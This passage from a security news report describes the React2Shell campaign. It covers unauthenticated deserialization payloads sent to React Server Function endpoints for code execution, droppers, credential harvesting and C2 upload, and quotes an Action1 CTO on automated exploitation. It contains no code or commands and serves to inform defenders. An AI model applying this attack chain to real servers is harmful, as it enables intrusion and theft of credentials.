The attacker crafts a malicious serialized payload designed to abuse the deserialization routine, a technique commonly used to trigger arbitrary object instantiation or method invocation on a server. The payload is sent via an HTTP request directly to a Server Function endpoint; no authentication is required. The server deserializes the malicious payload, resulting in arbitrary code execution in the server-side Node.js process.
The initial React exploit delivers a small dropper that fetches and runs a multi-phase harvesting script. Upon execution, the harvesting script goes through several phases to collect various data from the compromised system, which is then uploaded to a command and control server where it is loaded into a database.
Industrial scale
“This is all about neglect and efficiency,” Gene Moody, field CTO at patch management provider Action1, told CSO . “React2Shell quickly met all the criteria attackers look for: public disclosure, reliable exploitation, and internet-facing exposure. That combination effectively guaranteed widespread abuse. Since then, multiple campaigns have automated the full [attack] lifecycle [of], scanning, exploitation, and credential harvesting, with little to no human intervention.”
